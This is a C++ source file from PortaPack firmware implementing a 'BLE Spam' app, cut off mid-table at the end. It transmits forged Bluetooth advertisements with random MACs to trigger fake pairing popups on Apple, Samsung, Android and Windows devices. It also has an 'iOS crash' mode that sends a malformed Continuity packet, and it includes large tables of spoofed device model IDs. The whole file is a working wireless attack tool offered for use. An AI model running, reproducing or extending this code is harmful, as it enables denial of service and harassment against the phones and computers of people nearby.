/* * Copyright (C) 2014 Jared Boone, ShareBrained Technology, Inc. * Copyright (C) 2017 Furrtek * * This file is part of PortaPack. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; see the file COPYING. If not, write to * the Free Software Foundation, Inc., 51 Franklin Street, * Boston, MA 02110-1301, USA. */ // Code from https://github.com/Flipper-XFW/Xtreme-Apps/tree/04c3a60093e2c2378e79498b4505aa8072980a42/ble_spam/protocols // Thanks for the work of the original creators! #include "ui_blespam.hpp" #include "ui_modemsetup.hpp" #include "modems.hpp" #include "audio.hpp" #include "rtc_time.hpp" #include "baseband_api.hpp" #include "string_format.hpp" #include "portapack_persistent_memory.hpp" using namespace portapack; using namespace modems; using namespace ui; #ifndef COUNT_OF #define COUNT_OF(x) (sizeof(x) / sizeof(x[0])) #endif namespace ui::external_app::blespam { void BLESpamView::focus() { button_startstop.focus(); } uint64_t BLESpamView::get_freq_by_channel_number(uint8_t channel_number) { uint64_t freq_hz; switch (channel_number) { case 37: freq_hz = 2'402'000'000ull; break; case 38: freq_hz = 2'426'000'000ull; break; case 39: freq_hz = 2'480'000'000ull; break; case 0 ... 10: freq_hz = 2'404'000'000ull + channel_number * 2'000'000ull; break; case 11 ... 36: freq_hz = 2'428'000'000ull + (channel_number - 11) * 2'000'000ull; break; default: freq_hz = UINT64_MAX; } return freq_hz; } BLESpamView::BLESpamView(NavigationView& nav) : nav_{nav} { add_children({&button_startstop, &field_frequency, &tx_view, &chk_randdev, &options_atkmode, &console}); button_startstop.on_select = [this](Button&) { if (is_running) { is_running = false; stop(); button_startstop.set_text("Start"); } else { is_running = true; start(); button_startstop.set_text("Stop"); } }; chk_randdev.set_value(true); field_frequency.set_value(get_freq_by_channel_number(channel_number)); chk_randdev.on_select = [this](Checkbox&, bool v) { randomDev = v; }; options_atkmode.on_change = [this](size_t, int32_t i) { attackType = (ATK_TYPE)i; changePacket(true); }; console.writeln("Based on work of:"); console.writeln("@Willy-JL, @ECTO-1A,"); console.writeln("@Spooks4576, @iNetro"); console.writeln(""); changePacket(true); // init } void BLESpamView::stop() { transmitter_model.disable(); baseband::shutdown(); } void BLESpamView::start() { baseband::run_image(portapack::spi_flash::image_tag_btle_tx); transmitter_model.enable(); baseband::set_btletx(channel_number, mac, advertisementData, pduType); } void BLESpamView::reset() { stop(); start(); } void BLESpamView::randomChn() { channel_number = 37 + std::rand() % (39 - 37 + 1); field_frequency.set_value(get_freq_by_channel_number(channel_number)); } void BLESpamView::randomizeMac() { if (!randomMac) return; const char hexDigits[] = "0123456789ABCDEF"; // Generate 12 random hexadecimal characters for (int i = 0; i < 12; ++i) { int randomIndex = rand() % 16; mac[i] = hexDigits[randomIndex]; } mac[12] = '\0'; // Null-terminate the string } void BLESpamView::on_tx_progress(const bool done) { if (done) { if (is_running) { changePacket(false); baseband::set_btletx(channel_number, mac, advertisementData, pduType); } } } void BLESpamView::furi_hal_random_fill_buf(uint8_t* buf, uint32_t len) { for (uint32_t i = 0; i < len; i += 4) { const uint32_t random_val = rand(); uint8_t len_cur = ((i + 4) < len) ? (4) : (len - i); memcpy(&buf[i], &random_val, len_cur); } } void BLESpamView::createSamsungPacket() { uint8_t packet_SamsungSizes[] = {0, 31, 15}; EasysetupType type; const EasysetupType types[] = { EasysetupTypeBuds, EasysetupTypeWatch, }; type = types[rand() % COUNT_OF(types)]; uint8_t size = packet_SamsungSizes[type]; uint8_t* packet = (uint8_t*)malloc(size); uint8_t i = 0; switch (type) { case EasysetupTypeBuds: { uint32_t model; switch (PayloadModeRandom) { case PayloadModeRandom: default: model = buds_models[rand() % buds_models_count].value; break; /*case PayloadModeValue: model = cfg->data.buds.model; break;*/ } packet[i++] = 27; // Size packet[i++] = 0xFF; // AD Type (Manufacturer Specific) packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.) packet[i++] = 0x00; // ... packet[i++] = 0x42; packet[i++] = 0x09; packet[i++] = 0x81; packet[i++] = 0x02; packet[i++] = 0x14; packet[i++] = 0x15; packet[i++] = 0x03; packet[i++] = 0x21; packet[i++] = 0x01; packet[i++] = 0x09; packet[i++] = (model >> 0x10) & 0xFF; // Buds Model / Color (?) packet[i++] = (model >> 0x08) & 0xFF; // ... packet[i++] = 0x01; // ... (Always static?) packet[i++] = (model >> 0x00) & 0xFF; // ... packet[i++] = 0x06; packet[i++] = 0x3C; packet[i++] = 0x94; packet[i++] = 0x8E; packet[i++] = 0x00; packet[i++] = 0x00; packet[i++] = 0x00; packet[i++] = 0x00; packet[i++] = 0xC7; packet[i++] = 0x00; packet[i++] = 16; // Size packet[i++] = 0xFF; // AD Type (Manufacturer Specific) packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.) // Truncated AD segment, Android seems to fill in the rest with zeros break; } case EasysetupTypeWatch: { uint8_t model; switch (PayloadModeRandom) { case PayloadModeRandom: default: model = watch_models[rand() % watch_models_count].value; break; /*case PayloadModeValue: model = cfg->data.watch.model; break;*/ } packet[i++] = 14; // Size packet[i++] = 0xFF; // AD Type (Manufacturer Specific) packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.) packet[i++] = 0x00; // ... packet[i++] = 0x01; packet[i++] = 0x00; packet[i++] = 0x02; packet[i++] = 0x00; packet[i++] = 0x01; packet[i++] = 0x01; packet[i++] = 0xFF; packet[i++] = 0x00; packet[i++] = 0x00; packet[i++] = 0x43; packet[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?) break; } default: break; } // size, packet std::string res = to_string_hex_array(packet, size); memset(advertisementData, 0, sizeof(advertisementData)); std::copy(res.begin(), res.end(), advertisementData); free(packet); } void BLESpamView::createWindowsPacket() { /* const char* names[] = { "PortaPack", "HackRf", "iOS 21 🍎", "WorkMate", "👉👌", "🔵🦷", }; //not worky using fix, for testing. */ const char* name = "PortaPack"; // name = names[rand() % 6]; uint8_t name_len = strlen(name); uint8_t size = 7 + name_len; uint8_t* packet = (uint8_t*)malloc(size); uint8_t i = 0; packet[i++] = size - 1; // Size packet[i++] = 0xFF; // AD Type (Manufacturer Specific) packet[i++] = 0x06; // Company ID (Microsoft) packet[i++] = 0x00; // ... packet[i++] = 0x03; // Microsoft Beacon ID packet[i++] = 0x00; // Microsoft Beacon Sub Scenario packet[i++] = 0x80; // Reserved RSSI Byte memcpy(&packet[i], name, name_len); // Device Name i += name_len; // size, packet std::string res = to_string_hex_array(packet, size); memset(advertisementData, 0, sizeof(advertisementData)); std::copy(res.begin(), res.end(), advertisementData); free(packet); } void BLESpamView::createIosPacket(bool crash = false) { uint8_t ios_packet_sizes[18] = {0, 0, 0, 0, 0, 24, 0, 31, 0, 12, 0, 0, 20, 0, 12, 11, 11, 17}; ContinuityType type; const ContinuityType types[] = { ContinuityTypeProximityPair, ContinuityTypeNearbyAction, }; type = types[rand() % 2]; if (crash) type = ContinuityTypeCustomCrash; uint8_t size = ios_packet_sizes[type]; uint8_t* packet = (uint8_t*)malloc(size); uint8_t i = 0; packet[i++] = size - 1; // Size packet[i++] = 0xFF; // AD Type (Manufacturer Specific) packet[i++] = 0x4C; // Company ID (Apple, Inc.) packet[i++] = 0x00; // ... packet[i++] = type; // Continuity Type packet[i] = size - i - 1; // Continuity Size i++; switch (type) { case ContinuityTypeAirDrop: { packet[i++] = 0x00; // Zeros packet[i++] = 0x00; // ... packet[i++] = 0x00; // ... packet[i++] = 0x00; // ... packet[i++] = 0x00; // ... packet[i++] = 0x00; // ... packet[i++] = 0x00; // ... packet[i++] = 0x00; // ... packet[i++] = 0x01; // Version packet[i++] = (rand() % 256); // AppleID packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // Phone Number packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // Email packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // Email2 packet[i++] = (rand() % 256); // ... packet[i++] = 0x00; // Zero break; } case ContinuityTypeProximityPair: { uint16_t model; uint8_t color; switch (PayloadModeRandom) { case PayloadModeRandom: default: { uint8_t model_index = rand() % pp_models_count; uint8_t color_index = rand() % pp_models[model_index].colors_count; model = pp_models[model_index].value; color = pp_models[model_index].colors[color_index].value; break; } /* case PayloadModeValue: model = cfg->data.proximity_pair.model; color = cfg->data.proximity_pair.color; break;*/ } uint8_t prefix; if (model == 0x0055 || model == 0x0030) prefix = 0x05; else prefix = 0x01; packet[i++] = prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05) packet[i++] = (model >> 0x08) & 0xFF; // Device Model packet[i++] = (model >> 0x00) & 0xFF; // ... packet[i++] = 0x55; // Status packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level packet[i++] = (rand() % 256); // Lid Open Counter packet[i++] = color; // Device Color packet[i++] = 0x00; furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload i += 16; break; } case ContinuityTypeAirplayTarget: { packet[i++] = (rand() % 256); // Flags packet[i++] = (rand() % 256); // Configuration Seed packet[i++] = (rand() % 256); // IPv4 Address packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... break; } case ContinuityTypeHandoff: { packet[i++] = 0x01; // Version packet[i++] = (rand() % 256); // Initialization Vector packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // AES-GCM Auth Tag packet[i++] = (rand() % 256); // Encrypted Payload packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... break; } case ContinuityTypeTetheringSource: { packet[i++] = 0x01; // Version packet[i++] = (rand() % 256); // Flags packet[i++] = (rand() % 101); // Battery Life packet[i++] = 0x00; // Cell Service Type packet[i++] = (rand() % 8); // ... packet[i++] = (rand() % 5); // Cell Service Strength break; } case ContinuityTypeNearbyAction: { uint8_t action; switch (PayloadModeRandom) { case PayloadModeRandom: default: action = na_actions[rand() % na_actions_count].value; break; /* case PayloadModeValue: action = cfg->data.nearby_action.action; break;*/ } uint8_t flags; flags = 0xC0; if (action == 0x20 && rand() % 2) flags--; // More spam for 'Join This AppleTV?' if (action == 0x09 && rand() % 2) flags = 0x40; // Glitched 'Setup New Device' packet[i++] = flags; // Action Flags packet[i++] = action; // Action Type furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag i += 3; break; } case ContinuityTypeNearbyInfo: { packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code packet[i++] = (rand() % 256); // Status Flags packet[i++] = (rand() % 256); // Authentication Tag packet[i++] = (rand() % 256); // ... packet[i++] = (rand() % 256); // ... break; } case ContinuityTypeCustomCrash: { // Found by @ECTO-1A uint8_t action = na_actions[rand() % na_actions_count].value; uint8_t flags = 0xC0; if (action == 0x20 && rand() % 2) flags--; // More spam for 'Join This AppleTV?' if (action == 0x09 && rand() % 2) flags = 0x40; // Glitched 'Setup New Device' i -= 2; // Override segment header packet[i++] = ContinuityTypeNearbyAction; // Continuity Type packet[i++] = 5; // Continuity Size packet[i++] = flags; // Action Flags packet[i++] = action; // Action Type furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag i += 3; packet[i++] = 0x00; // Additional Action Data Terminator (?) packet[i++] = 0x00; // ... packet[i++] = ContinuityTypeNearbyInfo; // Continuity Type (?) furi_hal_random_fill_buf(&packet[i], 3); // Continuity Size (?) + Shenanigans (???) i += 3; break; } default: break; } // size, packet std::string res = to_string_hex_array(packet, size); memset(advertisementData, 0, sizeof(advertisementData)); std::copy(res.begin(), res.end(), advertisementData); free(packet); } void BLESpamView::createFastPairPacket() { uint32_t model = fastpairModels[rand() % fastpairModels_count].value; uint8_t size = 14; uint8_t* packet = (uint8_t*)malloc(size); uint8_t i = 0; packet[i++] = 3; // Size packet[i++] = 0x03; // AD Type (Service UUID List) packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) packet[i++] = 0xFE; // ... packet[i++] = 6; // Size packet[i++] = 0x16; // AD Type (Service Data) packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) packet[i++] = 0xFE; // ... packet[i++] = (model >> 0x10) & 0xFF; // Device Model packet[i++] = (model >> 0x08) & 0xFF; // ... packet[i++] = (model >> 0x00) & 0xFF; // ... packet[i++] = 2; // Size packet[i++] = 0x0A; // AD Type (Tx Power Level) packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm // size, packet std::string res = to_string_hex_array(packet, size); memset(advertisementData, 0, sizeof(advertisementData)); std::copy(res.begin(), res.end(), advertisementData); free(packet); } void BLESpamView::changePacket(bool forced = false) { counter++; // need to send it multiple times to be accepted if (counter >= 4 || forced) { // really change packet and mac. counter = 0; randomizeMac(); randomChn(); if (randomDev || forced) { switch (attackType) { case ATK_IOS_CRASH: createIosPacket(true); break; case ATK_IOS: createIosPacket(false); break; case ATK_SAMSUNG: createSamsungPacket(); break; case ATK_WINDOWS: createWindowsPacket(); break; default: case ATK_ANDROID: createFastPairPacket(); break; } } // rate limit console display displayCounter++; if (displayCounter > 25) { displayCounter = 0; console.writeln(advertisementData); } } } BLESpamView::~BLESpamView() { is_running = false; stop(); } const BLESpamView::ContinuityColor BLESpamView::colors_white[] = { {0x00}, //, "White" }; const BLESpamView::ContinuityColor BLESpamView::colors_airpods_max[] = { {0x00}, //, "White" {0x02}, //, "Red" {0x03}, //, "Blue" {0x0F}, //, "Black" {0x11}, //, "Light Green" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_flex[] = { {0x00}, //, "White" {0x01}, //, "Black" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_solo_3[] = { {0x00}, //, "White" {0x01}, //, "Black" {0x6}, //, "Gray" {0x7}, //, "Gold/White" {0x8}, //, "Rose Gold" {0x09}, //, "Black" {0xE}, //, "Violet/White" {0xF}, //, "Bright Red" {0x12}, //, "Dark Red" {0x13}, //, "Swamp Green" {0x14}, //, "Dark Gray" {0x15}, //, "Dark Blue" {0x1D}, //, "Rose Gold 2" {0x20}, //, "Blue/Green" {0x21}, //, "Purple/Orange" {0x22}, //, "Deep Blue/ Light blue" {0x23}, //, "Magenta/Light Fuchsia" {0x25}, //, "Black/Red" {0x2A}, //, "Gray / Disney LTD" {0x2E}, //, "Pinkish white" {0x3D}, //, "Red/Blue" {0x3E}, //, "Yellow/Blue" {0x3F}, //, "White/Red" {0x40}, //, "Purple/White" {0x5B}, //, "Gold" {0x5C}, //, "Silver" }; const BLESpamView::ContinuityColor BLESpamView::colors_powerbeats_3[] = { {0x00}, //, "White" {0x01}, //, "Black" {0x0B}, //, "Gray/Blue" {0x0C}, //, "Gray/Red" {0x0D}, //, "Gray/Green" {0x12}, //, "Red" {0x13}, //, "Swamp Green" {0x14}, //, "Gray" {0x15}, //, "Deep Blue" {0x17}, //, "Dark with Gold Logo" }; const BLESpamView::ContinuityColor BLESpamView::colors_powerbeats_pro[] = { {0x00}, //, "White" {0x02}, //, "Yellowish Green" {0x03}, //, "Blue" {0x04}, //, "Black" {0x05}, //, "Pink" {0x06}, //, "Red" {0x0B}, //, "Gray ?" {0x0D}, //, " Sky Blue }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_solo_pro[] = { {0x00}, //, "White" {0x01}, //, "Black" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_studio_buds[] = { {0x00}, //, "White" {0x0}, // 1, "Black" {0x02}, //, "Red" {0x03}, //, "Blue" {0x04}, //, "Pink" {0x06}, //, "Silver" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_x[] = { {0x00}, //, "White" {0x01}, //, "Black" {0x02}, //, "Blue" {0x05}, //, "Gray" {0x1D}, //, "Pink" {0x25}, //, "Dark/Red" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_studio_3[] = { {0x00}, //, "White" {0x01}, //, "Black" {0x02}, //, "Red" {0x03}, //, "Blue" {0x18}, //, "Shadow Gray" {0x19}, //, "Desert Sand" {0x25}, //, "Black / Red" {0x26}, //, "Midnight Black" {0x27}, //, "Desert Sand 2" {0x28}, //, "Gray" {0x29}, //, "Clear blue/ gold" {0x42}, //, "Green Forest camo" {0x43}, //, "White Camo" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_studio_pro[] = { {0x00}, //, "White" {0x01}, //, "Black" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_fit_pro[] = { {0x00}, //, "White" {0x01}, //, "Black" {0x02}, //, "Pink" {0x03}, //, "Grey/White" {0x04}, //, "Full Pink" {0x05}, //, "Neon Green" {0x06}, //, "Night Blue" {0x07}, //, "Light Pink" {0x08}, //, "Brown" {0x09}, //, "Dark Brown" }; const BLESpamView::ContinuityColor BLESpamView::colors_beats_studio_buds_[] = { {0x00}, //, "Black" {0x01}, //, "White" {0x02}, //, "Transparent" {0x03}, //, "Silver" {0x04}, //, "Pink" }; const BLESpamView::contiModels BLESpamView::pp_models[] = { {0x0E20, colors_white, COUNT_OF(colors_white)}, //"AirPods Pro", {0x0A20, colors_airpods_max, COUNT_OF(colors_airpods_max)}, //"AirPods Max", {0x0055, colors_white, COUNT_OF(colors_white)}, //"Airtag", {0x0030, colors_white, COUNT_OF(colors_white)}, //"Hermes Airtag", {0x0220, colors_white, COUNT_OF(colors_white)}, //"AirPods", {0x0F20, colors_white, COUNT_OF(colors_white)}, //"AirPods 2nd Gen", {0x1320, colors_white, COUNT_OF(colors_white)}, //"AirPods 3rd Gen", {0x1420, colors_white, COUNT_OF(colors_white)}, //"AirPods Pro 2nd Gen", {0x1020, colors_beats_flex, COUNT_OF(colors_beats_flex)}, // "Beats Flex", {0x0620, colors_beats_solo_3, COUNT_OF(colors_beats_solo_3)}, // "Beats Solo 3", {0x0320, colors_powerbeats_3, COUNT_OF(colors_powerbeats_3)}, //"Powerbeats 3", {0x0B20, colors_powerbeats_pro, COUNT_OF(colors_powerbeats_pro)}, //"Powerbeats Pro", {0x0C20, colors_beats_solo_pro, COUNT_OF(colors_beats_solo_pro)}, //"Beats Solo Pro", {0x1120, colors_beats_studio_buds, COUNT_OF(colors_beats_studio_buds)}, //"Beats Studio Buds", {0x0520, colors_beats_x, COUNT_OF(colors_beats_x)}, //"Beats X", {0x0920, colors_beats_studio_3, COUNT_OF(colors_beats_studio_3)}, //"Beats Studio 3", {0x1720, colors_beats_studio_pro, COUNT_OF(colors_beats_studio_pro)}, //"Beats Studio Pro", {0x1220, colors_beats_fit_pro, COUNT_OF(colors_beats_fit_pro)}, //"Beats Fit Pro", {0x1620, colors_beats_studio_buds_, COUNT_OF(colors_beats_studio_buds_)}, //"Beats Studio Buds+", }; const uint8_t BLESpamView::pp_models_count = COUNT_OF(pp_models); const BLESpamView::contiU8 BLESpamView::pp_prefixes[] = { {0x07}, //, "New Device" {0x01}, //, "Not Your Device" {0x05}, //, "New Airtag" }; const uint8_t BLESpamView::pp_prefixes_count = COUNT_OF(pp_prefixes); const BLESpamView::contiU8 BLESpamView::na_actions[] = { {0x13}, //, "AppleTV AutoFill" {0x27}, //, "AppleTV Connecting..." {0x20}, //, "Join This AppleTV?" {0x19}, //, "AppleTV Audio Sync" {0x1E}, //, "AppleTV Color Balance" {0x09}, //, "Setup New iPhone" {0x02}, //, "Transfer Phone Number" {0x0B}, //, "HomePod Setup" {0x01}, //, "Setup New AppleTV" {0x06}, //, "Pair AppleTV" {0x0D}, //, "HomeKit AppleTV Setup" {0x2B}, //, "AppleID for AppleTV?" }; const uint8_t BLESpamView::na_actions_count = COUNT_OF(na_actions); // fastpair const BLESpamView::fpUi32 BLESpamView::fastpairModels[] = { // Genuine non-production/forgotten (good job Google) {0x0001F0, "Bisto CSR8670 Dev Board"}, {0x000047, "Arduino 101"}, {0x470000, "Arduino 101 2"}, {0x00000A, "Anti-Spoof Test"}, {0x0A0000, "Anti-Spoof Test 2"}, {0x00000B, "Google Gphones"}, {0x0B0000, "Google Gphones 2"}, {0x0C0000, "Google Gphones 3"}, {0x00000D, "Test 00000D"}, {0x000007, "Android Auto"}, {0x070000, "Android Auto 2"}, {0x000008, "Foocorp Foophones"}, {0x080000, "Foocorp Foophones 2"}, {0x000009, "Test Android TV"}, {0x090000, "Test Android TV 2"}, {0x000035, "Test 000035"}, {0x350000, "Test 000035 2"}, {0x000048, "Fast Pair Headphones"}, {0x480000, "Fast Pair Headphones 2"}, {0x000049, "Fast Pair Headphones 3"}, {0x490000, "Fast Pair Headphones 4"}, {0x001000, "LG HBS1110"}, {0x00B727, "Smart Controller 1"}, {0x01E5CE, "BLE-Phone"}, {0x0200F0, "Goodyear"}, {0x00F7D4, "Smart Setup"}, {0xF00002, "Goodyear"}, {0xF00400, "T10"}, {0x1E89A7, "ATS2833_EVB"}, // Phone setup {0x00000C, "Google Gphones Transfer"}, {0x0577B1, "Galaxy S23 Ultra"}, {0x05A9BC, "Galaxy S20+"}, // Genuine devices {0xCD8256, "Bose NC 700"}, {0x0000F0, "Bose QuietComfort 35 II"}, {0xF00000, "Bose QuietComfort 35 II 2"}, {0x821F66, "JBL Flip 6"}, {0xF52494, "JBL Buds Pro"}, {0x718FA4, "JBL Live 300TWS"}, {0x0002F0, "JBL Everest 110GA"}, {0x92BBBD, "Pixel Buds"}, {0x000006, "Google Pixel buds"}, {0x060000, "Google Pixel buds 2"}, {0xD446A7, "Sony XM5"}, {0x2D7A23, "Sony WF-1000XM4"}, {0x0E30C3, "Razer Hammerhead TWS"}, {0x72EF8D, "Razer Hammerhead TWS X"}, {0x72FB00, "Soundcore Spirit Pro GVA"}, {0x0003F0, "LG HBS-835S"}, {0x002000, "AIAIAI TMA-2 (H60)"}, {0x003000, "Libratone Q Adapt On-Ear"}, {0x003001, "Libratone Q Adapt On-Ear 2"}, {0x00A168, "boAt Airdopes 621"}, {0x00AA48, "Jabra Elite 2"}, {0x00AA91, "Beoplay E8 2.0"}, {0x00C95C, "Sony WF-1000X"}, {0x01EEB4, "WH-1000XM4"}, {0x02AA91, "B&O Earset"}, {0x01C95C, "Sony WF-1000X"}, {0x02D815, "ATH-CK1TW"}, {0x035764, "PLT V8200 Series"}, {0x038CC7, "JBL TUNE760NC"}, {0x02DD4F, "JBL TUNE770NC"}, {0x02E2A9, "TCL MOVEAUDIO S200"}, {0x035754, "Plantronics PLT_K2"}, {0x02C95C, "Sony WH-1000XM2"}, {0x038B91, "DENON AH-C830NCW"}, {0x02F637, "JBL LIVE FLEX"}, {0x02D886, "JBL REFLECT MINI NC"}, {0xF00000, "Bose QuietComfort 35 II"}, {0xF00001, "Bose QuietComfort 35 II"}, {0xF00201, "JBL Everest 110GA"}, {0xF00204, "JBL Everest 310GA"}, {0xF00209, "JBL LIVE400BT"}, {0xF00205, "JBL Everest 310GA"}, {0xF00200, "JBL Everest 110GA"}, {0xF00208, "JBL Everest 710GA"}, {0xF00207, "JBL Everest 710GA"}, {0xF00206, "JBL Everest 310GA"}, {0xF0020A, "JBL LIVE400BT"}, {0xF0020B, "JBL LIVE400BT"}, {0xF0020C, "JBL LIVE400BT"}, {0xF00203, "JBL Everest 310GA"}, {0xF00202, "JBL Everest 110GA"}, {0xF00213, "JBL LIVE650BTNC"}, {0xF0020F, "JBL LIVE500BT"}, {0xF0020E, "JBL LIVE500BT"}, {0xF00214, "JBL LIVE650BTNC"}, {0xF00212, "JBL LIVE500BT"}, {0xF0020D, "JBL LIVE400BT"}, {0xF00211, "JBL LIVE500BT"}, {0xF00215, "JBL LIVE650BTNC"}, {0xF00210, "JBL LIVE500BT"}, {0xF00305, "LG HBS-1500"}, {0xF00304, "LG HBS-1010"}, {0xF00308, "LG HBS-1125"}, {0xF00303, "LG HBS-930"}, {0xF00306, "LG HBS-1700"}, {0xF00300, "LG HBS-835S"}, {0xF00309, "LG HBS-2000"}, {0xF00302, "LG HBS-830"}, {0xF00307, "LG HBS-1120"}, {0xF00301, "LG HBS-835"}, {0xF00E97, "JBL VIBE BEAM"}, {0x04ACFC, "JBL WAVE BEAM"}, {0x04AA91, "Beoplay H4"}, {0x04AFB8, "JBL TUNE 720BT"}, {0x05A963, "WONDERBOOM 3"}, {0x05AA91, "B&O Beoplay E6"}, {0x05C452, "JBL LIVE220BT"}, {0x05C95C, "Sony WI-1000X"}, {0x0602F0, "JBL Everest 310GA"}, {0x0603F0, "LG HBS-1700"}, {0x1E8B18, "SRS-XB43"}, {0x1E955B, "WI-1000XM2"}, {0x1EC95C, "Sony WF-SP700N"}, {0x1ED9F9, "JBL WAVE FLEX"}, {0x1EE890, "ATH-CKS30TW WH"}, {0x1EEDF5, "Teufel REAL BLUE TWS 3"}, {0x1F1101, "TAG Heuer Calibre E4 45mm"}, {0x1F181A, "LinkBuds S"}, {0x1F2E13, "Jabra Elite 2"}, {0x1F4589, "Jabra Elite 2"}, {0x1F4627, "SRS-XG300"}, {0x1F5865, "boAt Airdopes 441"}, {0x1FBB50, "WF-C700N"}, {0x1FC95C, "Sony WF-SP700N"}, {0x1FE765, "TONE-TF7Q"}, {0x1FF8FA, "JBL REFLECT MINI NC"}, {0x201C7C, "SUMMIT"}, {0x202B3D, "Amazfit PowerBuds"}, {0x20330C, "SRS-XB33"}, {0x003B41, "M&D MW65"}, {0x003D8A, "Cleer FLOW II"}, {0x005BC3, "Panasonic RP-HD610N"}, {0x008F7D, "soundcore Glow Mini"}, {0x00FA72, "Pioneer SE-MS9BN"}, {0x0100F0, "Bose QuietComfort 35 II"}, {0x011242, "Nirvana Ion"}, {0x013D8A, "Cleer EDGE Voice"}, {0x01AA91, "Beoplay H9 3rd Generation"}, {0x038F16, "Beats Studio Buds"}, {0x039F8F, "Michael Kors Darci 5e"}, {0x03AA91, "B&O Beoplay H8i"}, {0x03B716, "YY2963"}, {0x03C95C, "Sony WH-1000XM2"}, {0x03C99C, "MOTO BUDS 135"}, {0x03F5D4, "Writing Account Key"}, {0x045754, "Plantronics PLT_K2"}, {0x045764, "PLT V8200 Series"}, {0x04C95C, "Sony WI-1000X"}, {0x050F0C, "Major III Voice"}, {0x052CC7, "MINOR III"}, {0x057802, "TicWatch Pro 5"}, {0x0582FD, "Pixel Buds"}, {0x058D08, "WH-1000XM4"}, {0x06AE20, "Galaxy S21 5G"}, {0x06C197, "OPPO Enco Air3 Pro"}, {0x06C95C, "Sony WH-1000XM2"}, {0x06D8FC, "soundcore Liberty 4 NC"}, {0x0744B6, "Technics EAH-AZ60M2"}, {0x07A41C, "WF-C700N"}, {0x07C95C, "Sony WH-1000XM2"}, {0x07F426, "Nest Hub Max"}, {0x0102F0, "JBL Everest 110GA - Gun Metal"}, {0x0202F0, "JBL Everest 110GA - Silver"}, {0x0302F0, "JBL Everest 310GA - Brown"}, {0x0402F0, "JBL Everest 310GA - Gun Metal"}, {0x0502F0, "JBL Everest 310GA - Silver"}, {0x0702F0, "JBL Everest 710GA - Gun Metal"}, {0x0802F0, "JBL Everest 710GA - Silver"}, {0x054B2D, "JBL TUNE125TWS"}, {0x0660D7, "JBL LIVE770NC"}, {0x0103F0, "LG HBS-835"}, {0x0203F0, "LG HBS-830"}, {0x0303F0, "LG HBS-930"}, {0x0403F0, "LG HBS-1010"}, {0x0503F0, "LG HBS-1500"}, {0x0703F0, "LG HBS-1120"}, {0x0803F0, "LG HBS-1125"}, {0x0903F0, "LG HBS-2000"}, {0x0102F0, "JBL Everest 110GA"}, {0x0202F0, "JBL Everest 110GA"}, {0x0302F0, "JBL Everest 310GA"}, {0x0402F0, "JBL Everest 310GA"}, {0x0502F0, "JBL Everest 310GA"}, {0x060000, "Google Pixel Buds"}, {0x070000, "Android Auto"}, {0x0702F0, "JBL Everest 710GA"}, {0x071C74, "JBL Flip 6"}, {0x080000, "Foocorp Foophones"}, {0x0802F0, "JBL Everest 710GA"}, {0x090000, "Test Android TV"}, {0x0A0000, "Test 00000a - Anti-Spoofing"}, {0x0B0000, "Google Gphones"}, {0x0C0000, "Google Gphones"}, {0x0DC6BF, "My Awesome Device II"}, {0x0DC95C, "Sony WH-1000XM3"}, {0x0DEC2B, "Emporio Armani EA Connected"}, {0x0E138D, "WF-SP800N"}, {0x0EC95C, "Sony WI-C600N"}, {0x0ECE95, "Philips TAT3508"}, {0x0F0993, "COUMI TWS-834A"}, {0x0F1B8D, "JBL VIBE BEAM"}, {0x0F232A, "JBL TUNE BUDS"}, {0x0F2D16, "WH-CH520"}, {0x20A19B, "WF-SP800N"}, {0x20C95C, "Sony WF-SP700N"}, {0x20CC2C, "SRS-XB43"}, {0x213C8C, "DIZO Wireless Power"}, {0x21521D, "boAt Rockerz 355 (Green)"}, {0x21A04E, "oraimo FreePods Pro"}, {0x2D7A23, "WF-1000XM4"}, {0x350000, "Test 000035"}, {0x470000, "Arduino 101"}, {0x480000, "Fast Pair Headphones"}, {0x490000, "Fast Pair Headphones"}, {0x5BA9B5, "WF-SP800N"}, {0x5BACD6, "Bose QC Ultra Earbuds"}, {0x5BD6C9, "JBL TUNE225TWS"}, {0x5BE3D4, "JBL Flip 6"}, {0x5C0206, "UA | JBL TWS STREAK"}, {0x5C0C84, "JBL TUNE225TWS"}, {0x5C4833, "WH-CH720N"}, {0x5C4A7E, "LG HBS-XL7"}, {0x5C55E7, "TCL MOVEAUDIO S200"}, {0x5C7CDC, "WH-1000XM5"}, {0x5C8AA5, "JBL LIVE220BT"}, {0x5CC900, "Sony 